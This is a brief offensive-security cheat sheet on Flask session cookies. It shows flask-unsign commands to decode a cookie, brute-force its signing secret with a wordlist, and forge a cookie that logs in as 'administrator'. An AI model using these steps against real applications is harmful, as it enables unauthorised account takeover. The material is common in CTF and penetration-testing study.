# Flask Cookies

They have their own structure, similar to JWT. The cookie can be decoded and encoded with and sometimes without a key.
Cookies are not encrypted but signed, so the key for the siging can sometimes be bruteforces or can be found via a wordlist.

## Read Flask Cookie

Using `flask-unsign` this can be done via
```sh
flask-unsign --decode --cookie '<COOKIE>'
```

## Unsign the Flask Cookie

Unsigning the cookie can be done in the following way
```sh
flask-unsign --wordlist $WORDLIST --unsign --cookie '<COOKIE>' --no-literal-eval
```

## Sign the Flask Cookie

Siging the cookie can be done via
```sh
flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '<Secret>'
```